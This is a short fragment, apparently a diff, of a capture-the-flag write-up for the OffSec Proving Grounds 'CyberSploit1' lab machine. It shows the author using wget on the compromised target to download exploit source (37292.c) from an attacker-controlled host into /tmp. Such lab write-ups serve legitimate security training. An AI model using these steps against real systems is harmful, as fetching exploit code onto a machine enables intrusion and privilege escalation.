ctflearner/Proving-Ground-OffSec-Writeup/WARMUP-CATEGORY/CyberSploit1.md

 4. Now we download that file to our target machine by moving to /tmp directory, by the following command.(wget http://192.168.49.114/37292.c
 )
 ```
+# Downloading our exploit to Our Target machine
 ```python
 itsskv@cybersploit-CTF:~$ cd /tmp
 itsskv@cybersploit-CTF:/tmp$ wget http://192.168.49.114/37292.c